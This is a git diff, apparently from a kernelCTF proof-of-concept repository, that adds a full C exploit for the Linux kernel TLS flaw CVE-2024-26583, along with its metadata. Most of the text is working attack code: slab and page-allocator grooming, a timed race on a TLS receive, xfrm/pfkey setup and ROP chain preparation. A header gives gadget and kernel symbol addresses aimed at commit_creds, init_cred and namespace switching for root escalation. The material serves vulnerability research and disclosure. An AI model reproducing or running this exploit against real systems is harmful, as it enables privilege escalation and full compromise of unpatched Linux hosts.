XATTR_IDX_RANGE { + NEIGHBOUR, + PARTIAL1, // 1 + KMALLOC32, + KMALLOC32_2, // 3 + ORDER0, + ORDER1, // 5 + BEFORE2, // 6 + BEFORE3, // 7 + AFTER, // 8 + PCPFLUSH, // 9 +// Has to be the last one as indexes are > 1000 + PCPFLUSH2, + XATTR_IDX_MAX +}; + +#define XATTR_MAX_CHUNK 3000 +#define XATTR_IDX(base, offset) (base*XATTR_MAX_CHUNK + offset) + + +void create_watches(int fd) +{ + for (int i=0; itv_nsec += usecs * 1000; + + if (ts->tv_nsec >= NSEC_PER_SEC) { + ts->tv_sec++; + ts->tv_nsec -= NSEC_PER_SEC; + } +} + + +char *g_stack1; +char *g_stack2; + +struct child_arg { + int tfd; + int sock; + int try; +}; + +int child_recv(void *arg) +{ + struct itimerspec its = { 0 }; + struct child_arg *carg = (struct child_arg *) arg; + + + + set_cpu(1); + eventfd_t event_value; + eventfd_read(g_event2, &event_value); +// printf("child pid: %d sock: %d\n", getpid(), carg->sock); + + int delay = g_delay; + 
+ if (!delay) { + delay = 40 + (rand() % 5); + } + + ts_add(&its.it_value, delay); + + printf("delay: %d attempt: %d\n", delay, carg->try); + eventfd_write(g_event1, 1); + + timerfd_settime(carg->tfd, 0, &its, NULL); + set_cpu_all(); + + char recv_buf[256]; + memset(recv_buf, 'A', sizeof(recv_buf)); + int ret = recv(carg->sock, recv_buf, 10, MSG_DONTWAIT); + + + if (ret < 0) + perror("recv"); + + sleep(1000); + + return 0; +} + +#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */ + +void setup_tls(int sock, int is_rx) +{ + if (setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0) + err(1, "setsockopt"); + + static struct tls12_crypto_info_aes_ccm_128 crypto_info = {.info.version = TLS_1_2_VERSION, .info.cipher_type = TLS_CIPHER_AES_CCM_128}; + + if (setsockopt(sock, SOL_TLS, is_rx ? TLS_RX : TLS_TX, &crypto_info, sizeof(crypto_info)) < 0) + err(1, "TLS_TX"); +} + +int sender(void *a) +{ + int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + struct sockaddr_in addr; + memset(&addr, 0, sizeof(addr)); + + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + addr.sin_port = htons(7777); + + if (connect(sock, &addr, sizeof(addr)) < 0) + err(1, "connect"); + + + setup_tls(sock, 0); + + char buf[256]; + memset(buf, 'B', sizeof(buf)); + int ret = send(sock, buf, 100, 0); + sleep(2000); + exit(0); +} + +key_serial_t alloc_key(int id, size_t len, char *buf) +{ + key_serial_t serial; + char desc[256]; + len -= 24; + + snprintf(desc, sizeof(desc), "%d", id); + + serial = syscall(SYS_add_key, "user", desc, buf, len, KEY_SPEC_PROCESS_KEYRING); + + if (serial < 0) { + err(1, "key add"); + } + + return serial; +} + +key_serial_t alloc_keyring(int id) +{ + key_serial_t serial; + char desc[256]; + + snprintf(desc, sizeof(desc), "%d", id); + + serial = syscall(SYS_add_key, "keyring", desc, NULL, 0, KEY_SPEC_PROCESS_KEYRING); + + if (serial < 0) { + err(1, "keyring add"); + } + + return serial; +} + + +void prefault_heap() +{ + static 
char buf[16000];
+	int fd = open("/proc/self/maps", O_RDONLY);
+	if (fd < 0)
+		err(1, "open maps");
+
+	read(fd, buf, sizeof(buf) - 1);
+	close(fd);
+
+	char *s = buf;
+	while (1)
+	{
+		char *h = strstr(s, "[heap]");
+
+		if (!h)
+			break;
+
+		*h = '\0';
+		char *str1 = strrchr(s, '\n') + 1;
+		char *str_end;
+
+		s = h + 1;
+
+		unsigned long start = strtol(str1, &str_end, 16);
+		unsigned long end = strtol(str_end + 1, NULL, 16);
+		for (unsigned long addr = start; addr < end; addr += 0x1000)
+		{
+			volatile char *p = (char *) addr;
+			volatile char b = *p;
+			*p = b;
+		}
+	}
+}
+
+unsigned int parse_buddyinfo(char *buf, unsigned int order, unsigned int *total, unsigned int order_filter, unsigned int *all_table)
+{
+	char *t = strstr(buf, "Normal");
+
+	strtok(t, " ");
+
+	unsigned int result = 0;
+
+	if (total)
+		*total = 0;
+
+	for (int i = 0; i <= 10; i++)
+	{
+		unsigned int cnt = atoi(strtok(NULL, " "));
+		unsigned int p = 1u << i;
+
+		if (total) {
+			*total += cnt * p;
+		}
+
+		if (all_table)
+			all_table[i] = cnt;
+
+		if (!order_filter && i == order)
+			result = cnt;
+		else if (order_filter && i <= order_filter)
+			result += cnt * p;
+	}
+
+	return result;
+}
+
+unsigned int parse_zoneinfo(char *buf, unsigned int *high, unsigned int *batch)
+{
+	char *t;
+
+	t = strstr(buf, "zone Normal");
+	t = strstr(t, "cpu: 0");
+	t = strstr(t, "count: ");
+
+	unsigned int cnt = atoi(t + 7);
+
+	if (high) {
+		t = strstr(t, "high: ");
+		*high = atoi(t + 6);
+	}
+
+	if (batch) {
+		t = strstr(t, "batch: ");
+		*batch = atoi(t + 7);
+	}
+
+	return cnt;
+}
+
+void xfrm_add_sa_pfkey_compress(unsigned int id, int delete)
+{
+#define SA_ADDR_SIZE 3
+
+	size_t msg_len = sizeof(struct sadb_msg) + SA_ADDR_SIZE*8*2 + sizeof(struct sadb_sa);
+
+	struct sadb_msg *msg = calloc(1, msg_len);
+	if (!msg) {
+		perror("calloc");
+		exit(1);
+	}
+
+	msg->sadb_msg_version = PF_KEY_V2;
+
+	if (delete)
+		msg->sadb_msg_type = SADB_DELETE;
+	else
+		msg->sadb_msg_type = SADB_ADD;
+	msg->sadb_msg_satype = 
SADB_X_SATYPE_IPCOMP;
+	msg->sadb_msg_len = msg_len / 8;
+
+	struct sadb_address *src = (struct sadb_address *) (msg + 1);
+
+	src->sadb_address_len = SA_ADDR_SIZE;
+	src->sadb_address_exttype = SADB_EXT_ADDRESS_SRC;
+	src->sadb_address_prefixlen = 8;
+
+	struct sockaddr_in *srcaddr = (struct sockaddr_in *) (src + 1);
+	srcaddr->sin_family = AF_INET;
+	if (id == 2)
+		inet_pton(AF_INET, "127.0.0.1", &srcaddr->sin_addr);
+	else
+		srcaddr->sin_addr.s_addr = id;
+
+	struct sadb_address *dst = (struct sadb_address *) (srcaddr + 1);
+	dst->sadb_address_len = SA_ADDR_SIZE;
+	dst->sadb_address_exttype = SADB_EXT_ADDRESS_DST;
+	dst->sadb_address_prefixlen = 8;
+
+	struct sockaddr_in *dstaddr = (struct sockaddr_in *) (dst + 1);
+	dstaddr->sin_family = AF_INET;
+	if (id == 2)
+		inet_pton(AF_INET, "127.0.0.1", &dstaddr->sin_addr);
+	else
+		dstaddr->sin_addr.s_addr = id;
+
+	struct sadb_sa *sa = (struct sadb_sa *) (dstaddr + 1);
+	sa->sadb_sa_len = 2;
+	sa->sadb_sa_exttype = SADB_EXT_SA;
+	sa->sadb_sa_encrypt = SADB_X_CALG_DEFLATE;
+	sa->sadb_sa_spi = id;
+
+	struct msghdr hdr;
+	memset(&hdr, 0, sizeof(hdr));
+
+	struct iovec iov[1];
+	iov[0].iov_base = msg;
+	iov[0].iov_len = msg_len;
+
+	hdr.msg_iov = iov;
+	hdr.msg_iovlen = 1;
+
+	int ret = sendmsg(g_sock_key, &hdr, 0);
+
+	free(msg);
+
+	if (ret < 0)
+		err(1, "sendmsg pfkey add");
+}
+
+char * read_buddyinfo()
+{
+	static char zibuf[10000];
+	static int fdzi = -1;
+
+	if (fdzi < 0) {
+		fdzi = open("/proc/buddyinfo", O_RDONLY);
+		if (fdzi < 0)
+			err(1, "open buddyinfo");
+	}
+
+	lseek(fdzi, 0, SEEK_SET);
+	memset(zibuf, 0, sizeof(zibuf));
+	read(fdzi, zibuf, sizeof(zibuf) - 1);
+
+	return zibuf;
+}
+
+unsigned int get_zone_count(unsigned int order, unsigned int *total)
+{
+	return parse_buddyinfo(read_buddyinfo(), order, total, 0, NULL);
+}
+
+unsigned int get_zone_counts(unsigned int *table)
+{
+	return parse_buddyinfo(read_buddyinfo(), 0, NULL, 0, table);
+}
+
+unsigned int get_zone_count_filter(unsigned int order, unsigned int *total, unsigned order_filter)
+{ 
+	return parse_buddyinfo(read_buddyinfo(), order, total, order_filter, NULL);
+}
+
+unsigned int get_pagecount(unsigned int *high, unsigned int *batch)
+{
+	static char zibuf[10000];
+	static int fdzi = -1;
+
+	if (fdzi < 0) {
+		fdzi = open("/proc/zoneinfo", O_RDONLY);
+		if (fdzi < 0)
+			err(1, "open zoneinfo");
+	}
+
+	lseek(fdzi, 0, SEEK_SET);
+	memset(zibuf, 0, sizeof(zibuf));
+	read(fdzi, zibuf, sizeof(zibuf) - 1);
+
+	return parse_zoneinfo(zibuf, high, batch);
+}
+
+#define MAX_QIDS 32000
+static int all_qids[MAX_QIDS];
+static int qid = -1;
+static int all_qids_idx = 0;
+static size_t msg_allocated = 0;
+int alloc_msg(size_t len, char *buf, long id)
+{
+	long *msg;
+	char *our_buf = g_mmapped_buf;
+
+	assert(len > 48);
+
+	len -= 48;
+
+	if (qid < 0 || msg_allocated + len > 16000) {
+		if (all_qids_idx >= (MAX_QIDS - 1))
+			errx(1, "Exceeded max queues limit");
+
+		qid = all_qids[all_qids_idx++];
+		msg_allocated = 0;
+	}
+
+	msg = (long *) our_buf;
+
+	*msg = id + 1;
+//	memcpy(msg + 1, buf, len);
+
+	if (msgsnd(qid, msg, len, IPC_NOWAIT) < 0)
+		err(1, "msgsnd");
+
+	msg_allocated += len;
+
+	return qid;
+}
+
+// clear order 1 pcp list
+int flush_pcp(int xattr_fd)
+{
+	unsigned int pcp_high, pcp_batch;
+	unsigned int pcp_prev = get_pagecount(&pcp_high, &pcp_batch);
+	unsigned int flushed = 0;
+
+	unsigned int flush_cnt = 12;
+	for (int i = 0; i < PCPFLUSH2_CNT; i++)
+	{
+		free_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH2, i));
+
+		unsigned int pcp_count = get_pagecount(&pcp_high, &pcp_batch);
+
+		if (pcp_count < pcp_prev) {
+			if (++flushed >= flush_cnt)
+				break;
+		}
+
+		pcp_prev = pcp_count;
+	}
+
+	if (flushed < flush_cnt) {
+		printf("Unable to do enough pcp flushes\n");
+		return -1;
+	}
+
+	return 0;
+}
+
+int prepare_kmalloc32(int xattr_fd)
+{
+	prefault_heap();
+	int pcnt1 = get_pagecount(NULL, NULL);
+	unsigned int detected = 0;
+
+	for (int i = 0; i < KMALLOC32_CNT; i++)
+	{
+		alloc_xattr_fd2(xattr_fd, XATTR_IDX(KMALLOC32, i), 32, 32, g_mmapped_buf);
+		int pcnt2 = get_pagecount(NULL, 
NULL);
+
+		if ((pcnt2 - pcnt1) == -1 || (pcnt2 - pcnt1) == 30) {
+			detected = 1;
+			break;
+		}
+
+		pcnt1 = pcnt2;
+	}
+
+	if (!detected) {
+		printf("Unable to detect kmalloc-32 slab\n");
+		return -1;
+	}
+
+	return 0;
+}
+
+void prepare_pcp(int xattr_fd, int *msgs)
+{
+	char *m1 = mmap(NULL, 0x80000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0);
+	if (m1 == MAP_FAILED)
+		err(1, "mmap 0x80000");
+
+	unsigned int zone_counts[11];
+
+	get_zone_counts(zone_counts);
+
+	for (int i = 0; i < ORDER1_CNT; i++)
+	{
+		int zc1 = zone_counts[1];
+
+		msgs[i] = alloc_msg(256, g_mmapped_buf, i);
+		get_zone_counts(zone_counts);
+
+		if (zone_counts[1] < zc1) {
+			break;
+		}
+	}
+
+	for (int i = 0; i < ORDER0_CNT; i++)
+	{
+		msgs[20000 + i] = alloc_msg(256, g_mmapped_buf, 20000 + i);
+	}
+
+	unsigned int pcp_high, pcp_batch;
+	unsigned int pcp_count = get_pagecount(&pcp_high, &pcp_batch);
+
+	unsigned int to_free = pcp_high - pcp_count - 6;
+	for (int i = 0; i < PCPFLUSH_CNT; i++)
+	{
+		if (to_free < 8)
+			break;
+		free_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH, i));
+		pcp_count = get_pagecount(&pcp_high, &pcp_batch);
+		to_free = pcp_high - pcp_count - 1;
+	}
+	if (to_free > 0)
+		munmap(m1, to_free*0x1000);
+}
+
+int find_order1(int xattr_fd)
+{
+	unsigned int total1, total2;
+
+	get_zone_count(1, &total1);
+
+	unsigned int detected = 0;
+
+	char buf[32];
+	memset(buf, 'B', sizeof(buf));
+
+	int i;
+	for (i = 0; i < KMALLOC32_SLAB_CNT*30; i++)
+	{
+		alloc_xattr_fd2(xattr_fd, i, 32, 32, buf);
+		get_zone_count(1, &total2);
+
+		if (total2 < total1) {
+			detected = 1;
+			break;
+		}
+	}
+
+	if (!detected) {
+		printf("Unable to detect new final page!\n");
+		return -1;
+	}
+
+	return 0;
+}
+
+void setup_xfrm_policy(int sock, int spi)
+{
+	int res;
+
+	
struct xfrm_userpolicy_info *policy = calloc(1, sizeof(struct xfrm_userpolicy_info) + sizeof(struct xfrm_user_tmpl));
+	policy->action = XFRM_POLICY_ALLOW;
+	policy->sel.family = AF_INET;
+	policy->dir = XFRM_POLICY_OUT;
+
+	struct xfrm_user_tmpl *tmpl = (struct xfrm_user_tmpl *) (policy + 1);
+
+	tmpl->id.proto = IPPROTO_COMP;
+	tmpl->id.spi = spi;
+
+	res = setsockopt(sock, SOL_IP, IP_XFRM_POLICY, policy, sizeof(*policy) + sizeof(struct xfrm_user_tmpl));
+
+	if (res < 0) {
+		perror("setsockopt policy");
+		exit(1);
+	}
+
+	free(policy);
+}
+
+int create_xfrm_socket(int spi)
+{
+	int res;
+
+	int sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
+
+	if (sock < 0) {
+		perror("socket2");
+		exit(1);
+	}
+
+	struct sockaddr_in addr = {
+		.sin_family = AF_INET
+	};
+
+	inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);
+
+	res = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
+
+	if (res < 0) {
+		perror("connect");
+		exit(1);
+	}
+
+	setup_xfrm_policy(sock, spi);
+
+	return sock;
+}
+
+void stage2(int xattr_fd, int xattr_fd2)
+{
+	usleep(100000);
+
+	printf("Stage2 started\n");
+
+	xfrm_add_sa_pfkey_compress(2, 0);
+	xfrm_add_sa_pfkey_compress(1, 1);
+
+	usleep(200000);
+
+	char attr[256];
+	memset(attr, 0, sizeof(attr));
+
+	uint64_t g1 = kaddr(PUSH_RSI_JMP_QWORD_RSI_0F);
+
+	for (int i = 0; i < 200; i++)
+	{
+		snprintf(attr, sizeof(attr), "security.a%06d", i);
+		for (int j = 16; j < 184; j += 8)
+		{
+			uint64_t *p = (uint64_t *) (attr + j);
+			*p = g1;
+		}
+		alloc_xattr_fd_attr(xattr_fd2, attr, 193, g_mmapped_buf);
+	}
+
+	g_rop2_len = prepare_rop2((uint64_t *) g_rop2);
+	if (g_rop2_len > ROP2_CONST_OFFSET)
+		errx(1, "Stage 2 ROP size too big: %d > %d", g_rop2_len, ROP2_CONST_OFFSET);
+
+	prepare_rop(g_mmapped_buf);
+
+	int ret = send(g_sock_xfrm, g_mmapped_buf, 1000, 0);
+	if (ret < 0)
+		perror("send");
+
+	xfrm_add_sa_pfkey_compress(2, 1);
+}
+
+void prepare_queues()
+{
+	int key = 0x1234;
+	for (int i = 0; i < MAX_QIDS; i++)
+	{
+		all_qids[i] = msgget(key + i, IPC_CREAT | 
0600);
+
+		if (all_qids[i] < 0)
+			err(1, "msgget");
+	}
+	all_qids_idx = 0;
+	qid = -1;
+	msg_allocated = 0;
+}
+
+int one_attempt(int tfd, int tfd2)
+{
+	static unsigned int try = 0;
+	int success = 0;
+
+	char fname[512];
+	char fname2[512];
+
+	snprintf(fname, sizeof(fname), "/tmp/y_%d", try);
+	int xattr_fd = open(fname, O_RDWR|O_CREAT, 0600);
+	if (xattr_fd < 0)
+		err(1, "xattr open");
+	snprintf(fname2, sizeof(fname2), "/tmp/a_%d", try);
+	int xattr_fd2 = open(fname2, O_RDWR|O_CREAT, 0600);
+	if (xattr_fd2 < 0)
+		err(1, "xattr open");
+
+	int tfd3 = timerfd_create(CLOCK_MONOTONIC, 0);
+
+	int sock_serv = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+
+	if (sock_serv < 0)
+		err(1, "socket");
+
+	int flag = 1;
+	setsockopt(sock_serv, SOL_SOCKET, SO_REUSEADDR, &flag, sizeof(flag));
+
+	struct sockaddr_in addr, peer_addr;
+	memset(&addr, 0, sizeof(addr));
+
+	addr.sin_family = AF_INET;
+	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
+	addr.sin_port = htons(7777);
+
+	if (bind(sock_serv, (struct sockaddr *)&addr, sizeof(addr)) < 0)
+		err(1, "bind");
+
+	listen(sock_serv, 99999);
+
+	pid_t sender_pid = clone(sender, g_stack2 + STACK_SIZE, CLONE_FS | CLONE_FILES | CLONE_VM | SIGCHLD, NULL);
+
+	if (sender_pid < 0)
+		err(1, "clone sender");
+
+	socklen_t sz = sizeof(peer_addr);
+	int sock = accept(sock_serv, (struct sockaddr *)&peer_addr, &sz);
+
+	if (sock < 0)
+		err(1, "accept");
+
+	set_cpu(0);
+
+#define BIG_SIZE 0x80000
+
+	if (!g_bigbuf) {
+		g_bigbuf = mmap(NULL, BIG_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0);
+		if (g_bigbuf == MAP_FAILED)
+			err(1, "mmap g_bigbuf");
+
+		allocate_twsock_slab();
+	}
+
+	prepare_queues();
+
+	struct child_arg carg = {
+		.tfd = tfd,
+		.sock = sock,
+		.try = try
+	};
+
+	pid_t pid = clone(child_recv, g_stack1 + STACK_SIZE, CLONE_FS | CLONE_FILES | CLONE_VM | SIGCHLD, (void *) &carg);
+
+	for (int i = 0; i < PARTIAL1_CNT; i++)
+	{
+		alloc_xattr_fd(xattr_fd, XATTR_IDX(PARTIAL1, i), 257, g_mmapped_buf);
+	}
+
+	for (int i = 0; i < 
PCPFLUSH_CNT; i++)
+	{
+		alloc_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH, i), 16*1024 + 32, g_bigbuf);
+	}
+	for (int i = 0; i < PCPFLUSH2_CNT; i++)
+	{
+		alloc_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH2, i), 16*1024 + 32, g_bigbuf);
+	}
+
+	unsigned int pcnt1, pcnt2;
+
+	unsigned int slabs_detected = 0;
+	unsigned int slabs_to_skip = 1;
+
+	g_before2_cnt = SLAB_CNT*(slabs_to_skip + 10);
+	for (int i = 0; i < g_before2_cnt; i++)
+	{
+		pcnt1 = get_pagecount(NULL, NULL);
+
+		alloc_xattr_fd(xattr_fd, XATTR_IDX(BEFORE2, i), 257, g_mmapped_buf);
+
+		pcnt2 = get_pagecount(NULL, NULL);
+		if (pcnt1 - pcnt2 == 2) {
+			slabs_detected++;
+
+			if (slabs_detected == slabs_to_skip)
+				break;
+		}
+	}
+
+	int do_exit = 0;
+	if (slabs_detected < slabs_to_skip) {
+		printf("Not enough new slabs detected!\n");
+		do_exit = 1;
+
+		goto nexttry;
+	}
+
+	for (int i = 0; i < BEFORE3_CNT; i++)
+	{
+		alloc_xattr_fd(xattr_fd, XATTR_IDX(BEFORE3, i), 257, g_mmapped_buf);
+	}
+
+// At this point we have current slab almost full, last slot will be allocated by tls main context
+// rx context and crypto tfm will be allocated from the new slab
+
+	setup_tls(sock, 1);
+
+	for (int i = 0; i < NEIGH_CNT; i++)
+	{
+		alloc_xattr_fd(xattr_fd, XATTR_IDX(NEIGHBOUR, i), 257, g_mmapped_buf);
+	}
+
+	for (int i = 0; i < AFTER_CNT; i++)
+	{
+		alloc_xattr_fd(xattr_fd, XATTR_IDX(AFTER, i), 257, g_mmapped_buf);
+	}
+
+	if (prepare_kmalloc32(xattr_fd) < 0)
+		goto nexttry;
+
+	if (flush_pcp(xattr_fd) < 0)
+		goto nexttry;
+
+	static int msgs2[30000];
+	prepare_pcp(xattr_fd, msgs2);
+
+	for (int i = 0; i < NEIGH_CNT; i++)
+	{
+		free_xattr_fd(xattr_fd, XATTR_IDX(NEIGHBOUR, i));
+	}
+
+	for (int i = 0; i < PARTIAL1_CNT/SLAB_CNT - 3; i++)
+	{
+		free_xattr_fd(xattr_fd, XATTR_IDX(PARTIAL1, i*SLAB_CNT));
+	}
+
+	printf("Preparations ok, attempting to race ...\n");
+
+	struct itimerspec its = { 0 };
+
+	eventfd_write(g_event2, 1);
+
+	eventfd_t event_value;
+	eventfd_read(g_event1, &event_value);
+
+	ts_add(&its.it_value, 
g_delay + 1000);
+
+	timerfd_settime(tfd3, 0, &its, NULL);
+
+	uint64_t v1;
+	read(tfd3, &v1, sizeof(v1));
+
+	close(sock);
+
+	usleep(100);
+
+	for (int i = PARTIAL1_CNT/SLAB_CNT - 3; i < PARTIAL1_CNT/SLAB_CNT; i++)
+	{
+		free_xattr_fd(xattr_fd, XATTR_IDX(PARTIAL1, i*SLAB_CNT));
+	}
+
+// Trigger pcp flush
+	free_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH, PCPFLUSH_CNT - 1));
+
+	if (find_order1(xattr_fd2) < 0)
+		goto nexttry;
+
+	xfrm_add_sa_pfkey_compress(1, 0);
+
+	stage2(xattr_fd, xattr_fd2);
+
+nexttry:
+	set_cpu(0);
+
+	for (int i = 0; i < MAX_QIDS; i++)
+	{
+		if (msgctl(all_qids[i], IPC_RMID, NULL) < 0)
+			err(1, "msgctl");
+	}
+
+	close(sock_serv);
+	close(tfd3);
+	close(xattr_fd);
+	unlink(fname);
+	close(xattr_fd2);
+	unlink(fname2);
+
+	kill(sender_pid, 9);
+	kill(pid, 9);
+
+	int status;
+
+	if (waitpid(pid, &status, 0) < 0)
+		err(1, "waitpid");
+
+	if (waitpid(sender_pid, &status, 0) < 0)
+		err(1, "waitpid");
+
+	if (do_exit)
+		exit(0);
+	try++;
+	usleep(300000);
+
+	return success;
+}
+
+int main2(int argc, char **argv)
+{
+	g_mmapped_buf = mmap(NULL, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE|MAP_LOCKED, -1, 0);
+	if (g_mmapped_buf == MAP_FAILED) {
+		perror("mmap");
+		return 1;
+	}
+
+	memset(g_mmapped_buf, 0, MMAP_SIZE);
+
+	struct timeval tv;
+	gettimeofday(&tv, NULL);
+
+	srand((tv.tv_sec * 1000) + (tv.tv_usec / 1000));
+
+	set_cpu(0);
+
+	struct sockaddr_alg sa = {
+		.salg_family = AF_ALG,
+		.salg_type = "skcipher",
+		.salg_name = "cryptd(ctr(aes-generic))"
+	};
+	int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);
+
+	if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
+		err(1, "af_alg bind");
+
+	struct sockaddr_alg sa2 = {
+		.salg_family = AF_ALG,
+		.salg_type = "aead",
+		.salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
+	};
+
+	if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa2)) < 0)
+		err(1, "af_alg bind");
+
+	usleep(1500000);
+
+	g_stack1 = mmap(NULL, STACK_SIZE, PROT_READ | 
PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
+	g_stack2 = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
+	if (g_stack1 == MAP_FAILED || g_stack2 == MAP_FAILED) {
+		perror("mmap stack");
+		exit(1);
+	}
+
+#define ROP2_MMAP_SIZE 0x4000
+	g_rop2 = mmap(NULL, ROP2_MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE|MAP_LOCKED, -1, 0);
+	if (g_rop2 == MAP_FAILED)
+		err(1, "mmap");
+
+	int tfd = timerfd_create(CLOCK_MONOTONIC, 0);
+	int tfd2 = timerfd_create(CLOCK_MONOTONIC, 0);
+
+	g_sock_key = socket(AF_KEY, SOCK_RAW, PF_KEY_V2);
+
+	if (g_sock_key == -1)
+		err(1, "socket key");
+
+	create_watches(tfd);
+
+	g_event1 = eventfd(0, 0);
+	g_event2 = eventfd(0, 0);
+
+	printf("parent pid: %d\n", getpid());
+
+	set_cpu(0);
+
+	mlockall(MCL_CURRENT);
+	g_sock_xfrm = create_xfrm_socket(2);
+
+	for (int i = 0; i < MAX_ATTEMPTS; i++)
+	{
+		if (one_attempt(tfd, tfd2))
+			break;
+	}
+
+	return 0;
+}
+
+int main(int argc, char **argv)
+{
+	int status;
+
+	if (argc > 1) {
+		g_kernel_text = strtoul(argv[1], NULL, 16);
+	} else {
+		printf("Using default kernel base, your chance is 1/512, good luck!\nTry providing leaked kernel base as argv[1]\n");
+		g_kernel_text = 0xffffffff81000000uL;
+	}
+
+	struct rlimit rlim;
+	rlim.rlim_cur = rlim.rlim_max = 4096;
+	if (setrlimit(RLIMIT_NOFILE, &rlim) < 0)
+		err(1, "setrlimit()");
+
+	setbuf(stdout, NULL);
+
+	setup_namespaces();
+	setup_network("lo");
+
+	sleep(2);
+
+	for (int i = 0; i < MAX_ATTEMPTS2; i++)
+	{
+		pid_t pid = fork();
+		if (!pid)
+			return main2(argc, argv);
+		waitpid(pid, &status, 0);
+	}
+
+	return 0;
+}
diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/kernelver_17412.226.68.h b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/kernelver_17412.226.68.h
new file mode 
100644
index 000000000..0e9534a8e
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/kernelver_17412.226.68.h
@@ -0,0 +1,24 @@
+#define COPY_USER_GENERIC_STRING 0xffffffff817d41b0
+#define PUSH_RDI_JMP_QWORD_RSI_0F 0xffffffff81c5f168
+#define FIND_TASK_BY_VPID 0xffffffff81104580
+#define POP_RCX 0xffffffff810287cc
+#define INIT_CRED 0xffffffff83462140
+#define PUSH_RSI_JMP_QWORD_RSI_0F 0xffffffff81c696b5
+#define POP_RSI_RDX_RCX 0xffffffff810287ca
+#define INIT_NSPROXY 0xffffffff83461f00
+#define SWITCH_TASK_NAMESPACES 0xffffffff8110bd30
+#define PUSH_RAX_JMP_QWORD_RCX 0xffffffff813dad92
+#define POP_RDI_RSI_RDX_RCX 0xffffffff810287c9
+#define POP_RSI_RDI 0xffffffff8196e521
+#define POP_RDX_RDI 0xffffffff817bfadb
+#define AUDIT_SYSCALL_EXIT 0xffffffff811b1c60
+#define RETURN_VIA_SYSRET 0xffffffff822001cf
+#define MEMCPY 0xffffffff81ff5e30
+#define COMMIT_CREDS 0xffffffff8110d710
+#define POP_RSI 0xffffffff81fc28f9
+#define POP_RSP 0xffffffff81105ceb
+#define POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX 0xffffffff810287c1
+#define POP_RDI 0xffffffff810d03ac
+#define POP_RDX 0xffffffff810643dd
+#define RW_BUFFER 0xffffffff83500000
+#define G1 0x
diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/metadata.json b/pocs/linux/kernelctf/CVE-2024-26583_cos/metadata.json
new file mode 100644
index 000000000..1f5362d6d
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/metadata.json
@@ -0,0 +1,31 @@
+{
+    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+    "submission_ids": [
+        "exp128"
+    ],
+    "vulnerability": {
+        "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=aec7961916f3f9e88766e2688992da6980f11b8d",
+        "cve": "CVE-2024-26583",
+        "affected_versions": [
+            "4.20 - 5.15.159",
+            "4.20 - 6.1.78"
+        ],
+        "requirements": {
+            "attack_surface": [
+            ],
+            "capabilities": [
+            ],
+            "kernel_config": [
+                "CONFIG_TLS"
+            ]
+        }
+    },
+    "exploits": {
+        
"cos-105-17412.226.68": { + "uses": [ + ], + "requires_separate_kaslr_leak": true, + "stability_notes": "10% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-26583_cos/original.tar.gz new file mode 100644 index 000000000..31cd84596 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26583_cos/original.tar.gz differ